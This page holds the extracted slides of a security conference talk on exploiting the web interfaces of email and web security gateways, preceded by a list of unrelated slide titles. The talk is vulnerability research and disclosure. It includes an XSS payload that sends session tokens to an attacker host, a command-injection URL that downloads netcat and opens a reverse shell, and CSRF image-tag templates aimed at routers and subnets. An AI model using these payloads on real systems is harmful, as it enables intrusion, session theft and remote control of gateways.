TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024
 
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live StreamsTop 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 

They Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces

  • 1. They ought to know better: Exploiting Security Gateways via their Web Interfaces Ben Williams NGS-Secure NCC Group Plc, Manchester Technology Centre, Oxford Road, Manchester M1 7EF www.nccgroup.com
  • 2. Introduction §  35+ Exploits found and reported to vendors of Security Gateways since October 2011 §  Many are serious issues which can lead an external attacker to compromise the Gateway §  Owning the Gateway can be quick, and powerful… as I will show you…
  • 3. Which kind of products? §  Security Gateways -  Multifunction Security Gateways -  Email and Web filtering §  Appliances and Software §  Some examples include: -  ClearOS, Untangle, McAfee, Proofpoint, Barracuda -  Websense, Symantec (Brightmail)
  • 4. How are they deployed?
  • 5. What do they look like? Screenshots removed for slides
  • 6. My Exploit Research method §  Find vendor site, sign-up §  Download product evaluation -  get eval-key (30 days) §  Install VM and snapshot §  “Blast it” with automated scanners §  Prod and poke it with Burp -  (majority of time) §  SSH as root for whitebox testing §  Create/test exploits §  Log and report exploits
  • 7. Common vulnerabilities found §  Input-validation issues (90% of products) -  XSS, command-injection, SQLi, parameter-tampering §  Predictable URLs & parameters = CSRF §  Excessive privileges §  Various session-management issues §  Authentication bypass and information- disclosure §  Out-of-date software, default configs/ content §  Brute force password guessing -  (too basic but lots of it)
  • 8. Attack stages §  Phase one: -  Gaining access to the UI §  Phase two: -  Gaining access to the operating- system
  • 9. Interesting examples 1 §  ClearOS -  Information disclosure
  • 12. Recap – UI ownage
  • 14. Recap – Root shell and pivoting
  • 15. Post exploitation §  It’s common for useful tools to be already installed -  gcc -  tcpdump -  netcat -  Nmap -  Perl/Python -  yum/apt-get -  stunnel §  File-system frequently not “hardened” -  No SELinux
  • 16. Other session-token disclosure Screenshots removed for slides
  • 17. More session-tokens – bypassing cookie security §  Bypass cookie security flags (Http-Only) §  Session-token reflected on a page with XSS = Pull session–token out of the DOM, send to attacker https://192.168.1.42:9999/xxxx? xxxx=SrvCtrl&method=get&cmd=listtags&s erver=<img src=nothing onerror='document.write("<img src= "http://192.168.1.50/"+ (document.firstChild.innerHTML.substr(312,2 4)) + """)'>
  • 18. Attack scenarios §  Direct access to the Security Gateway UI -  Auth-bypass, session-hijacking, information-disclosure §  No direct access to the UI -  CSRF, XSS -  (Requires reconnaissance, and interaction with users) -  Special case of CSRF -  OSRF with out-of-band XSS
  • 19. CSRFing Website users <html> <img src=" http://www.example.com/sensitive- function?dosomthing=nasty" height=“0” width=“0”> </html>
  • 20. CSRFing Home routers <html> <img src=" http://192.168.1.254:81/sensitive- function?dosomthing=nasty" height=“0” width=“0”> </html>
  • 21. CSRFing Corporate Security Gateways Attacker Victim
  • 22. Interesting examples 2 §  Websense -  Unauthenticated command-injection as SYSTEM -  Advanced CSRF
  • 23. Reverse shell from single URL https://192.168.1.42:xxxx/xxxx?xxxx=echo  .pdf%26echo  strUrl  %3d  ^"http:^"  %2b   chr(47)  %2b  chr(47)  %2b  ^"192.168.233.11^"  %2b  chr(47)  %2b  ^"nc.exe^">  http.vbs %26echo  StrFile  %3d  ^"nc.exe^"  >>  http.vbs%26echo  Const   HTTPREQUEST_PROXYSETTING_DEFAULT  %3d  0  >>  http.vbs%26echo  Const   HTTPREQUEST_PROXYSETTING_PRECONFIG  %3d  0  >>  http.vbs%26echo  Const   HTTPREQUEST_PROXYSETTING_DIRECT  %3d  1  >>  http.vbs%26echo  Const   HTTPREQUEST_PROXYSETTING_PROXY  %3d  2  >>  http.vbs%26echo  Dim  http,  varByteArray,   strData,  strBuffer,  lngCounter,  fs,  ts  >>  http.vbs%26echo      Err.Clear  >>  http.vbs %26echo      Set  http  %3d  Nothing  >>  http.vbs%26echo      Set  http  %3d   CreateObject(^"WinHttp.WinHttpRequest.5.1^")  >>  http.vbs%26echo      If  http  Is   Nothing  Then  Set  http  %3d  CreateObject(^"WinHttp.WinHttpRequest^")  >>  http.vbs %26echo      If  http  Is  Nothing  Then  Set  http  %3d   CreateObject(^"MSXML2.ServerXMLHTTP^")  >>  http.vbs%26echo      If  http  Is  Nothing   Then  Set  http  %3d  CreateObject(^"Microsoft.XMLHTTP^")  >>  http.vbs%26echo       http.Open  ^"GET^",  strURL,  False  >>  http.vbs%26echo      http.Send  >>  http.vbs%26echo     varByteArray  %3d  http.ResponseBody  >>  http.vbs%26echo      Set  http  %3d  Nothing  >>   http.vbs%26echo      Set  fs  %3d  CreateObject(^"Scripting.FileSystemObject^")  >>   http.vbs%26echo      Set  ts  %3d  fs.CreateTextFile(StrFile,  True)  >>  http.vbs%26echo       strData  %3d  ^"^"  >>  http.vbs%26echo      strBuffer  %3d  ^"^"  >>  http.vbs%26echo      For   lngCounter  %3d  0  to  UBound(varByteArray)  >>  http.vbs%26echo              ts.Write  Chr(255   And  Ascb(Midb(varByteArray,lngCounter  %2b  1,  1)))  >>  http.vbs%26echo      Next  >>   http.vbs%26echo      ts.Close  >>  http.vbs%26http.vbs%26nc.exe  192.168.233.11  443  -­‐e   cmd.exe|  
  • 24. But how to exploit it?
  • 25. Problems with CSRFing internal products from outside §  Who is the admin? §  How do you get the admin to click something malicious whilst logged- in? §  Product-UI port locked down to specific users? §  Don’t know internal IP address of the product in advance?
  • 26. Ways to find DMZ IP addresses §  From SMTP relays bounced messages §  Misconfigured Web servers
  • 27. CSRF a whole subnet <html> <img src= http://192.168.1.1:xxxx/...etc... <img src= http://192.168.1.2:xxxx/...etc... <img src= http://192.168.1.3:xxxx/...etc... <img src= http://192.168.1.4:xxxx/...etc... <img src= http://192.168.1.5:xxxx/...etc... <img src= http://192.168.1.6:xxxx/...etc... <img src= http://192.168.1.7:xxxx/...etc... ...etc...
  • 28. Use the browser (and proxy)
  • 29. There’s no place like localhost §  127.0.0.1 §  127.0.0.2 §  There are millions of ways of representing localhost, that the browser will not spot, and will send to the proxy, but the proxy will treat as localhost
  • 33. Interesting examples 3 §  Proofpoint  (video/demo)   -­‐  Enumerate  email  addresses -­‐  OSRF  via  email  
  • 37. Recap – UI ownage via OSRF
  • 39. Conclusion §  Exploiting Security Gateway products offers powerful positions for an attacker §  Wide range of issues, some very serious -  Some easy to find, some harder §  Most techniques used are several years old §  I feel there is a big knowledge gap between secure website development and secure UI development
  • 40. Further research §  This is a rich area for exploit- development -  35+ Exploits found so far in Security Gateways (just takes time) -  Lots of similar products vulnerable to similar attacks §  Other types of product -  Daniel Compton – Similar project but for Network-Monitoring software ~ 35+ exploits so far -  I’ve started looking at SSL VPNs
  • 41. Questions and suggestions §  Whitepaper available at BlackHat EU §  Company Website: http://www.ngssecure.com §  Personal Blog: http://insidetrust.blogspot.com §  QUESTIONS?